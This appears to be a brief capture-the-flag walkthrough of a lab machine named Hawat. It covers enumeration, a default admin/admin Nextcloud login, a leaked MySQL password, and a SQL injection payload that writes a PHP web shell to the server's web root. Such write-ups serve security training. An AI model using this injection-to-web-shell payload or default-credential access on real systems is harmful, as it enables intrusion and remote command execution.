Skip to content

Hawat 🔹

Enumeration

17445 port shows a web page of an issue tracker

We can register users and log in

Port 30455 show us a web with no links

Using feroxbuster we find a nextcloud instance

Trying admin/admin works

We find the issue tracker project in here

Download and exploring it and we have the mysql password

issue_user:ManagementInsideOld797

We can see that priority param is injectable in checkByPriority function

So going to the web

Get is not allowed so, post? Capture the request with caido

Changing GET to POST

And adding priority param, we got to 200

We saw with feroxbuster that there is a phpinfo that shows that the root path is /srv/http so we can inject a webshell.

We can inject a web shell

' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- -

Encode with https://www.url-encode-decode.com/

Accessing the path

Post Exploitation

Get the flag